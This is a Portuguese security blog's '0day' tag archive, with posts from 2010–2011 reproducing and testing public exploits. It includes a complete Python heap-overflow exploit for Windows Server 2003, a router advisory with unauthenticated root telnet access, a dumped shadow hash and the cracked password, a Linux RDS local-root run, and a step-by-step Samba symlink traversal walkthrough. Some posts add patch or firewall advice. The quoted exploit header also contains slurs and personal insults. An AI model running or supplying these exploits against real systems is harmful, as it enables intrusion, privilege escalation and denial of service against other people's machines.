Tag Archive: 0day


PoC MS11-083

Filed Under: Hacking, Security by admin — Leave a comment
14 de novembro de 2011

Informado pela sans..

An integer overflow in the TCP/IP stack allows random code execution from a stream of UDP packets sent to a closed port. Permission for the attacker are at kernel level.

Depois de sair o exploit para a vulnerabilidade MS11-083 realizei a prova de conceito para verificar o que ocorre na tal situação.

A Mirosoft informou que para se explorada será necessário enviar aproximadamente 2^32 pacotes UDP para obter êxito na exploração.

No lab temos um Debian que faz o ataque e o Windows 2003 Standard com 1Gb de memória RAM 4 CPU’s que será atacado.

O exploit divulgado publicamente: http://packetstormsecurity.org/files/106873/winnuke2011.sh.txt , utilizei somente o código em C .

 

Compilando….

debian:~/2003# gcc -lpthread MS11-083.c -o MS11-083

debian:~/2003# ./MS11-083
[+] MS11-083 DoS/PoC exploit
[!] Usage : ./MS11-083 <server> <port>

 

No Windows.. tudo sobre controle..

 

Antes do Ataque

Antes do Ataque

 

 

Começamos o ataque…

debian:~/2003# ./MS11-083 192.168.10.131 1000
[+] MS11-083 DoS/PoC exploit
[-] Sending payload ‘ZSW”<kc’ULJ=VK%XE-cP0*%(‘bORT=”;D”[c=S'
[-] Thread number 0 started
[-] Sending payload ’60&a;%=^,7FKMc[D=J>90J6Y7DR]*PC<&8′.%) ‘
[-] Thread number 1 started
[-] Sending payload ‘dCJe-f+65f9@NJhH-c”!?XU% (7#TDOhjIa+`=_)’
[-] Thread number 2 started
[-] Sending payload ‘/;.S”0:#dd=kSACiD=S!OLO#V/ZLP<]L`?,/D$’
[-] Thread number 3 started
[-] Sending payload ‘”S.Q]=JOT” (8%O)-4bF+NeN I@**A<.Di/RV\5>’
[-] Thread number 4 started
[-] Sending payload ‘Ag0BMF”FF[ aB]*9*UQi<2H!8X&LieC>`U1AKQ7B’
[-] Thread number 5 started
[-] Sending payload ‘,=aTOe9-]”A&,B-;:b,f0<@BVX#VbM’WQD;K_f’
[-] Thread number 6 started
[-] Sending payload ‘AH2M R!h\+#H>e.VD-bDI;1″JJ’ JeQG6Sg2C’
[-] Thread number 7 started
[-] Sending payload ‘*X-KOSYQF!86#M53C^f1Z+jM=*+[.e56&0h)kiQ'
[-] Thread number 8 started

 

Em questão de segundos veremos o gráfico de performace do Windows..

Após o ataque

Após o ataque

Em outro console temos a saída do tcpdump

debian:~/2003# tcpdump -X -vvv -i eth0 dst host 192.168.10.131
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
23:47:47.221788 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.
23:47:47.221846 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.
23:47:47.221850 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.
23:47:47.221853 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.
23:47:47.221856 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.

 

Nesta situação temos somente 1 computador atacando, o script esta utilizando toda a CPU do Debian.

PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
3541 root         20   0  273m    976  484   S  97.2     0.2           0:16.40 MS11-083

 

No atual lab não conseguimos causar um DoS no alvo, mas de acordo com os resultados vimos que isso seria possível seeeeeeeeee… o firewall estivesse desabilitado….

Agora vamos habilitar o firewall do windows, e voltaremos ao ataque e os gráficos…

 

Firewalled

Firewalled

 

Ou seja, o ataque pode ser mitigado sem muitos problemas. Para completar os 2^32 pacotes enviados levaria aproximadamente 52 dias, paramos por aqui sem a verdadeira prova que seria possível executar um código remotamente.

Mais informações sobre o Bug: http://technet.microsoft.com/en-us/security/bulletin/ms11-083

Resumindo, sempre firewall ativado e sistema atualizado!

Outro exploit e mais infos pode ser encontrado também em: http://blog.rootentropy.co.za/post/12567851289/ms11-083-traffic-capture

 

[]‘s

Sergito

Tags: , , , ,
Comment

Kernel 2.6.30 Local Root Exploit

Filed Under: Ferramentas, Hacking, Linux, Security by admin — Leave a comment
3 de outubro de 2011
Mais um xploit para kernel 2.6.30....

http://1337day.com/exploits/16993

[]'s
Sérgito
Tags: , ,
Comment

Microsoft WINS Service Remote Code Execution Vulnerability

Filed Under: Hacking, Windows by admin — Leave a comment
11 de maio de 2011

Depois de alguns longos meses, volto a postar por aqui, desta vez é um falha no serviço do wins do windows server, que permite a execução de código remotamente.

A falha somente caiu a público após o lançamento do patch, que pode ser baixado em: http://www.microsoft.com/technet/security/bulletin/MS11-035.mspx

Mais informações sobre a falha descoberta pelo Luigi Auriemma pode ser lida na securityfocus: http://www.securityfocus.com/bid/47730/info

Até o momento nenhum exploit lançado… até o momento… rsrsr

 

[]‘s

Sergito

 

 

Tags: ,
Comment

Linksys WAP610N Unauthenticated Access With Root Privileges

Filed Under: Hacking, Security by admin — Leave a comment
17 de fevereiro de 2011
Só rindo mesmo...
telnet <access-point IP> 1111
Command> system id
Output>  uid=0(root) gid=0(root)


Secure Network - Security Research Advisory

Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
Systems affected: WAP610N (Firmware Version: 1.0.01)
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.linksysbycisco.com
Author(s): Matteo Ignaccolo m.ignaccolo@securenetwork.it
Vendor disclosure: 14/06/2010
Vendor acknowledged: 14/06/2010
Vendor bugfix: 14/12/2010 (reply to our request for update)
Vendor patch release: ??
Public disclosure: 10/02/2011
Advisory number: SN-2010-08
Advisory URL: http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt

*** SUMMARY ***

Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.

Unauthenticated remote textual administration console has been found that allow an attacker to run system command as root user.

*** VULNERABILITY DETAILS ***

telnet <access-point IP> 1111

Command> system id
Output>  uid=0(root) gid=0(root)

Coomand> system cat /etc/shadow
Ouptup>  root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
Ouptup>  bin:*:10933:0:99999:7:::
Ouptup>  daemon:*:10933:0:99999:7:::
Ouptup>  adm:*:10933:0:99999:7:::
Ouptup>  lp:*:10933:0:99999:7:::
Ouptup>  sync:*:10933:0:99999:7:::
Ouptup>  shutdown:*:10933:0:99999:7:::
Ouptup>  halt:*:10933:0:99999:7:::
Ouptup>  uucp:*:10933

root password is "wlan" (cracked with MDcrack http://mdcrack.openwall.net)

List of console's command:

ATHENA_READ
ATHENA_WRITE
CHIPVAR_GET
DEBUGTABLE
DITEM
DMEM
DREG16
DREG32
DREG8
DRV_CAT_FREE
DRV_CAT_INIT
DRV_NAME_GET
DRV_VAL_GET
DRV_VAL_SET
EXIT
GENIOCTL
GETMIB
HELP
HYP_READ
HYP_WRITE
HYP_WRITEBUFFER
ITEM16
ITEM32
ITEM8
ITEMLIST
MACCALIBRATE
MACVARGET
MACVARSET
MEM_READ
MEM_WRITE
MTAPI
PITEMLIST
PRINT_LEVEL
PROM_READ
PROM_WRITE
READ_FILE
REBOOT
RECONF
RG_CONF_GET
RG_CONF_SET
RG_SHELL
SETMIB
SHELL
STR_READ
STR_WRITE
SYSTEM
TEST32
TFTP_GET
TFTP_PUT
VER

*** EXPLOIT ***

Attackers may exploit these issues through a common telnet client as explained above.

*** FIX INFORMATION ***

No patch is available.

*** WORKAROUNDS ***

Put access points on separate wired network and filter network traffic to/from 1111 tcp port.

[]‘

Sergito

Tags: ,
Comment

MS Windows Server 2003 Remote Heap Overflow

Filed Under: Hacking, Security by admin — Leave a comment
15 de fevereiro de 2011

Sem muitos comentários, simples e direto, Windows 2003 server remote Heap Overflow !

 

####################################################################################
#MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
#Release date: 2011-02-14
#Anonymous Comment: Apologies if this puts a downer on the MSRC valentines
day sausage fest
#Author: Cupidon-3005
#Greet: Winny Thomas, Laurent Gaffie, h07
#Bug: Heap Overflow
#Remote Exploitability: Unlikely
#Local Exploitability: Likely
#Context: Broadcast, Pre-Auth
#Special Valentines Greetings: Ruben Santamarta, is your password still
"hijodeputa"? You look even more like a dumb fuck than you used to.
#From dailydave: [
https://lists.immunityinc.com/pipermail/dailydave/20110121/000057.html], So
your 31337 con is the only place to get 0day? Here's some pre-auth /
#broadcast 0day free for all on FD with 0% conference whoring, and punks are
welcome as well.
#####################################################################################
#Mrxsmb.sys, around BowserWriteErrorLog+0x175, while trying to copy 1go from
ESI to EDI ...
#Code will look something like this:
#if ((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len =
TotalSize/sizeof(WCHAR) - 1; }
#-1 causes Len to go 0xFFFFFFFF
#Feel free to reuse this code without restrictions and ask Kingcope-Fag to
perform his FTP FU on SMB, he might have more luck than MS.
"
import socket,sys,struct
from socket import *

if len(sys.argv)<=4:
 sys.exit("""usage: python sploit.py UR-IP BCAST-IP NBT-NAME AD-NAME
 example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah
AD-NETBIOS-NAME""")

ourip = sys.argv[1]
host = sys.argv[2]
srcname = sys.argv[3].upper()
dstname = sys.argv[4].upper()

ELEC            = "\x42\x4f\x00"
WREDIR          = "\x41\x41\x00"

def encodename(nbt,service):
    final = '\x20'+''.join([chr((ord(i)>>4) + ord('A'))+chr((ord(i)&0xF) +
ord('A')) for i in nbt])+((15 - len(nbt)) * str('\x43\x41'))+service
    return final

def lengthlittle(packet,addnum):
    length = struct.pack("<i", len(packet)+addnum)[0:2]
    return length

def lengthbig(packet,addnum):
    length = struct.pack(">i", len(packet)+addnum)[2:4]
    return length

def election(srcname):
    elec = "\x08"
    elec+= "\x09" #Be the boss or die
    elec+= "\xa8\x0f\x01\x20" #Be the boss or die
    elec+= "\x1b\xe9\xa5\x00" #Up time
    elec+= "\x00\x00\x00\x00" #Null, like SDLC
    elec+= srcname+"\x00"
    return elec

def smbheaderudp(op="\x25"):
    smbheader= "\xff\x53\x4d\x42"
    smbheader+= op
    smbheader+= "\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00\x00\x00\x00\x00\x00\x00"
    smbheader+=  "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    return smbheader

def
trans2mailslot(tid="\x80\x0b",ip=ourip,sname="LOVE-SDL",dname="SRD-LOVE",namepipe="\MAILSLOT\BROWSE",srcservice="\x41\x41\x00",dstservice="\x41\x41\x00",pbrowser=""):
    packetbrowser  =  pbrowser
    packetmailslot = "\x01\x00"
    packetmailslot+= "\x00\x00"
    packetmailslot+= "\x02\x00"
    packetmailslot+= lengthlittle(packetbrowser+namepipe,4)
    packetmailslot+= namepipe +"\x00"
    packetdatagram = "\x11"
    packetdatagram+= "\x02"
    packetdatagram+= tid
    packetdatagram+= inet_aton(ip)
    packetdatagram+= "\x00\x8a"
    packetdatagram+= "\x00\xa7"
    packetdatagram+= "\x00\x00"
    packetdatagramname = encodename(sname,srcservice)
    packetdatagramname+= encodename(dname,dstservice)
    smbheader= smbheaderudp("\x25")
    packetrans2 = "\x11"
    packetrans2+= "\x00\x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\xe8\x03\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot,4)
    packetrans2+= "\x03"
    packetrans2+= "\x00"
    andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2)
    lengthcalc =
packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetfinal =
packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetotalength = list(packetfinal)
    packetotalength[10:12] = lengthbig(lengthcalc,0)
    packetrans2final = ''.join(packetotalength)
    return packetrans2final

def sockbroad(host,sourceservice,destservice,packet):
   s = socket(AF_INET,SOCK_DGRAM)
   s.setsockopt(SOL_SOCKET, SO_BROADCAST,1)
   s.bind(('0.0.0.0', 138))
   try:
      packsmbheader = smbheaderudp("\x25")
      buffer0 =
trans2mailslot(tid="\x80\x22",ip=ourip,sname=srcname,dname=dstname,namepipe="\MAILSLOT\BROWSER",srcservice=sourceservice,
dstservice=destservice, pbrowser=packet)
      s.sendto(buffer0,(host,138))
   except:
      print "expected SDL error:", sys.exc_info()[0]
      raise

sockbroad(host,WREDIR,ELEC,election("A" * 410)) # -> Zing it! (between
~60->410)
print "Happy St-Valentine Bitches\nMSFT found that one loooooooong time
ago...."
####################################################################################


by packetstormsecurity




[]'s


Sergito


 

			


			

				
Tags: , , 

				

					
													Comment 
											
				

			


		


		

		


			

				
0day++

				

					
Filed Under: Hacking, Notícias by admin — Leave a comment

					
5 de novembro de 2010

				

			


			

				
Mais alguns 0day’s que saíram esta semana… desta vez, o IE entrou na roda junto com ProFTPd. Isto sem comentar os bugs que surgem na semana para softwares da adobe.


Os dois bugs já possuem módulo para a exploração no metasploit.


Mais Infos sobre o bug do IE: http://isc.sans.edu/diary.html?storyid=9874


Módulo do metasploit para o ProFTPd (somente para FreeBSD até o momento) :


https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb


Post Rápido e direto pois estou indo dormir…


Fim de semana postarei os testes realizados..


[]‘s


Sergito

			


			

				
Tags: 

				

					
													Comment 
											
				

			


		


		

		


			

				
Falha Kernel Linux 2.6

				

					
Filed Under: Hacking, Linux by admin — Leave a comment

					
1 de novembro de 2010

				

			


			

				
Já faz um tempinho que a falha caiu no mundo underground, e a algumas semanas foi a público, a falha em um módulo do kernel permite exploração e escalar privilégios. A falha descoberta pelo Dan Rosenberg, existente nas versões do kernel >= 2.6.30, afeta um módulo do kernel que facilmente pode ser explorada e assim obter o id=0.


Na securityfocus foi publicado juntamente com o exploit, porém foi preciso adicionar 2 linhas definindo o valor para umas variáveis quando compilado para o debian, são elas:


#define AF_RDS 21


#define PF_RDS AF_RDS


E vemos abaixo a exploração em um ubuntu..


trash@trash-desktop:~/k-2.6$ uname -r


2.6.32-21-generic


trash@trash-desktop:~/k-2.6$ ls


linux.c


trash@trash-desktop:~/k-2.6$ gcc linux.c -o linux


trash@trash-desktop:~/k-2.6$ ls


linux  linux.c


trash@trash-desktop:~/k-2.6$ ./linux


[*] Linux kernel >= 2.6.30 RDS socket exploit


[*] by Dan Rosenberg


[*] Resolving kernel addresses…


[+] Resolved rds_proto_ops to 0xf81c9980


[+] Resolved rds_ioctl to 0xf81c3090


[+] Resolved commit_creds to 0xc016dcc0


[+] Resolved prepare_kernel_cred to 0xc016e000


[*] Overwriting function pointer…


[*] Triggering payload…


[*] Restoring function pointer…


[*] Got root!


# id


uid=0(root) gid=0(root)


#




Simples… Um alternativa é desabilitar o módulo RDS da inicialização do Kernel ou aplicar o patch que esta disponível via git…


# “alias net-pf-21 off” > /etc/modprobe.d/disable-rds


Download do exploit: linux.c


[]‘s


Sergito

			


			

				
Tags: , , 

				

					
													Comment 
											
				

			


		


		

		


			

				
Microsoft Windows Local Privilege Escalation Vulnerability

				

					
Filed Under: Hacking, Security by admin — Leave a comment

					
6 de julho de 2010

				

			


			

				
Uma falha que afeta grande parte do windows Vista e 2008 server foi publicada recentemente juntamente com o seu exploit no securityfocus. A falha local explora diretamente o kernel do windows e se vulnerável escala privilégios, caso contrário pode causar um DoS. Vale a pena conferir e testar..






Vulnerable:
Microsoft Windows Vista Ultimate 64-bit edition SP2

Microsoft Windows Vista Ultimate 64-bit edition SP1

Microsoft Windows Vista Home Premium 64-bit edition SP2

Microsoft Windows Vista Home Premium 64-bit edition SP1

Microsoft Windows Vista Home Basic 64-bit edition SP2

Microsoft Windows Vista Home Basic 64-bit edition SP1

Microsoft Windows Vista Enterprise 64-bit edition SP2

Microsoft Windows Vista Enterprise 64-bit edition SP1

Microsoft Windows Vista Business 64-bit edition SP2

Microsoft Windows Vista Business 64-bit edition SP1

Microsoft Windows Vista Ultimate SP2

Microsoft Windows Vista Ultimate SP1

Microsoft Windows Vista Home Premium SP2

Microsoft Windows Vista Home Premium SP1

Microsoft Windows Vista Home Basic SP2

Microsoft Windows Vista Home Basic SP1

Microsoft Windows Vista Enterprise SP2

Microsoft Windows Vista Enterprise SP1

Microsoft Windows Vista Business SP2

Microsoft Windows Vista Business SP1

Microsoft Windows Server 2008 for x64-based Systems SP2

Microsoft Windows Server 2008 for x64-based Systems 0

Microsoft Windows Server 2008 for Itanium-based Systems SP2

Microsoft Windows Server 2008 for Itanium-based Systems 0

Microsoft Windows Server 2008 for 32-bit Systems SP2

Microsoft Windows Server 2008 for 32-bit Systems 0		











Mais info.. http://www.securityfocus.com/bid/41280/info


[]‘s


Sergito

			


			

				
Tags: , 

				

					
													Comment 
											
				

			


		


		

		


			

				
SSH 0day !!

				

					
Filed Under: Inutilidades by admin — Leave a comment

					
1 de abril de 2010

				

			


			

				
hahaha primeiro de abril!! :d


Foi só um sonho!!


[]‘s Sergito

			


			

				
Tags: , 

				

					
													Comment 
											
				

			


		


		

		


			

				
Terça-Feira Insana!!

				

					
Filed Under: Security, Windows by admin — Leave a comment

					
9 de fevereiro de 2010

				

			


			

				
Eu apelido como o dia D, ou como a SANS prefere dizer, a terça-feira negra. Hoje Terça-Feira (09-02-10), 13 Vulnerabilidades em produtos Microsoft lançadas e maioria de estado CRÍTICO, algumas para clients outras para servers. Não deixe de LER!! e Patchear! Ahh sem contar do 0day em BD Oracle que a mesma pediu que retirasse do ar o vídeo que saiu na BlackHat.


link: http://isc.sans.org/diary.html?storyid=8197

			


			

				
Tags: , 

				

					
													Comment 
											
				

			


		


		

		


			

				
Samba 0day

				

					
Filed Under: Hacking by admin — Leave a comment

					
6 de fevereiro de 2010

				

			


			

				
O assunto do dia foi esse, depois que o kcope publicou o exploit do samba ontem (04-02-2010), muito semelhante a que ocorreu em 2004, fui testa-lo  para ser assunto de mais um post aqui no blog. Quando explorado a falha, é possível  listar, ler e copiar arquivos para o sistema atacado, não somente no diretório compartilhado pelo samba, mas sim todo o “/” do seu linux. Nos testes que realizei (Debian), só foi preciso criar um compartilhamento com permissão de escrita para todos, que é necessário para o xploit funcionar.


1) Mão na massa, primeiramente baixe o source do samba, eu utilizei a versão 3.4.5: http://samba.org/samba/ftp/stable/samba-3.4.5.tar.gz


2) Será necessário alterar um arquivo do source do samba e alterar um bloco como descrito abaixo:


vi ~/samba-3.4.5/source3/client/client.c


/****************************************************************************

UNIX symlink.

****************************************************************************/


static int cmd_symlink(void)

{

TALLOC_CTX *ctx = talloc_tos();

char *oldname = NULL;

char *newname = NULL;

char *buf = NULL;

char *buf2 = NULL;

char *targetname = NULL;

struct cli_state *targetcli;


if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||

!next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {

d_printf(“symlink <oldname> <newname>\n”);

return 1;

}

oldname = talloc_asprintf(ctx,

“%s”,                // << HERE modified

buf);

if (!oldname) {

return 1;

}

newname = talloc_asprintf(ctx,

“%s”,                // << HERE modified

buf2);

if (!newname) {

return 1;

}

/* COMENTE

oldname = talloc_asprintf(ctx,

“%s%s”,                // < modified (see above)

client_get_cur_dir(),        // < removed (see above)

buf);

if (!oldname) {

return 1;

}

newname = talloc_asprintf(ctx,

“%s%s”,                // < modified (see above)

client_get_cur_dir(),        // < removed (see above)

buf2);

if (!newname) {

return 1;

}

———————————————-*/


if (!cli_resolve_path(ctx, “”, auth_info, cli, oldname, &targetcli, &targetname)) {

d_printf(“link %s: %s\n”, oldname, cli_errstr(cli));

return 1;


}


if (!SERVER_HAS_UNIX_CIFS(targetcli)) {

d_printf(“Server doesn’t support UNIX CIFS calls.\n”);

return 1;

}


if (!cli_unix_symlink(targetcli, targetname, newname)) {

d_printf(“%s symlinking files (%s -> %s)\n”,

cli_errstr(targetcli), newname, targetname);

return 1;

}


return 0;

}


——————————————————————————————————————————


Como visto acima, algumas linhas do bloco “UNIX symlink” foram alterados, a melhor opção é remover o bloco do arquivo original e colar o bloco acima no seu source.


3) Agora vamos compilar o samba:


# cd ~/samba-3.4.5/source3/


#./configure  && make && make install


4) Localizar o diretório compartilhado:


# smbclient -s /etc/samba/smb.conf -L //192.168.48.128


Irá listar os diretórios compartilhados no alvo, no meu caso deu um problema com uma biblioteca no momento da execução, para resolver alterei a variável LD_LIBRARY_PATH.


# export LD_LIBRARY_PATH=/usr/local/samba/lib    < local da lib do samba


5) Acessando o compartilhamento:


# smbclient -s /etc/samba/smb.conf   //192.168.48.128/shared


A pasta compartilhada chama-se “shared”, lembrando, ela deverá ter permissão total de escrita para o guest.


6) Xploit!!


Vc irá cair no prompt do samba (smb: \>), se vc executar o “ls”, ele irá listar os arquivo de dentro da pasta compartilhada, mas e agora??


no prompt do samba digite:  symlink ../../../../../ root


Executando o “ls” novamente, listará uma pasta chamada “root”, óóóóóóóóó!! Agora entre nela!


smb: \> cd root


smb: \root\> ls


UAUUU!! o conteúdo do “/” inteiro a disposição!! Agora é só navegar nas pastas e transferir arquivos!!


Esta 0day é de total crédito do kcope, autor de diversas 0day’s. (http://www.milw0rm.com/author/113 | http://twitter.com/Kingcope)


[]‘s Sergito


vi ~/samba-3.4.5/source3/client/client.c

			


			

				
Tags: , , 

				

					
													Comment 
											
				

			


		


		

		


			

				
Mysql 0day

				

					
Filed Under: Hacking, Security by admin — Leave a comment

					
7 de janeiro de 2010

				

			


			

				
Será uma possível 0day para mysql? A intevydis publicou um video com o PoC onde era possível executar códigos remotamente em algum sistema que estiver rodando o MySQL 5.x. O video demonstra a exploração na versão 5.0.51a-24, o que resta agora é atualizar e aguardar maiores informações, ou se vc escreve xploits, tem um caminho a seguir!!


Ahh!! quem possui o CANVAS pode realizar o teste, ja esta incluso no VulnDisco exploit pack.

			


			

				
Tags: , 

				

					
													Comment